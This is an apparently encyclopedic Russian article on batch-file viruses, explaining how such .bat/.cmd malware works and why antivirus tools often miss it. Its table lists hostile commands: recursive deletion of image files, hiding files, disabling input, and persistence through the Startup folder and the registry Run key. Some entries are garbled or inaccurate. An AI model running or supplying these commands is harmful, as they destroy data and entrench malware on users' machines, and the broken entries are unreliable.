Пакетный вирус
Пакетный вирус — вид вредоносной программы, написанной в виде пакетного файла. Данный тип вируса опасен тем, что у него есть почти полный доступ к системе и её автозагрузке, фото и видео файлам. Также его не всегда определяют антивирусные программы.
Принцип работы
Пакетный вирус — это последовательность команд (которая может причинить вред владельцу компьютера), для командного интерпретатора операционной системы, выполненная в виде пакетного файла. Пакетный файл представляет собой обычный текстовый файл, но, в отличие от последнего, имеет расширение .bat, .cmd, или .btm. Пакетные файлы используются для автоматизации различный действий, например, в процессе установки программ или рутинной работы.
Распознание
Антивирусные программы не всегда определяют пакетные вирусы как вредоносные программы, лишь иногда их идентифицируя как «трояны» или программы-шутки.
Команды вируса
Перед вводом команд в файле на первой строчке ставится @echo off. Несколько команд, характерных для пакетного вируса:
| Команда | Значение | ||
|---|---|---|---|
| del %0 | Самоудаление вируса | ||
| /q | Маркер выполнения команды без разрешения пользователя | ||
| attrib +h D:*.* | Установить атрибут «Скрытый» на файлы, находящиеся в D: | ||
| rundll32 keyboard, disable | Отключить клавиатуру | ||
| date 29.07.36 | Сменить дату на 29.07.2036 | ||
| rundll32 user,SwapMouseButton | Смена кнопок мыши местами | ||
| del /s /q *.png | Удаляет все фотки (Только .png) | ||
| md 1 | Создаст папку на диске под названием 1 | ||
| copy %0 C:\1.bat | Копирует вирус в C:\ и переименовывает его на 1.bat | ||
| copy %0 C:\Users\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | Добавляет файл virus.bat в автозагрузку OC | attrib +h %0 | Скрывает себя (virus.bat) |
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "virus" /t REG_SZ /d "Местоположение virus.bat" /f | Добавляет virus.bat в реестр | :return
echo TEST goto return |
Выполняет бесконечность раз команду "echo TEST" |
 | В статье не хватает ссылок на источники (см. также рекомендации по поиску). |
| Инфекционное вредоносное ПО | |
|---|---|
| Методы сокрытия | |
| Вредоносные программы для прибыли | |
| По операционным системам | |
| Защита | |
| Контрмеры | |
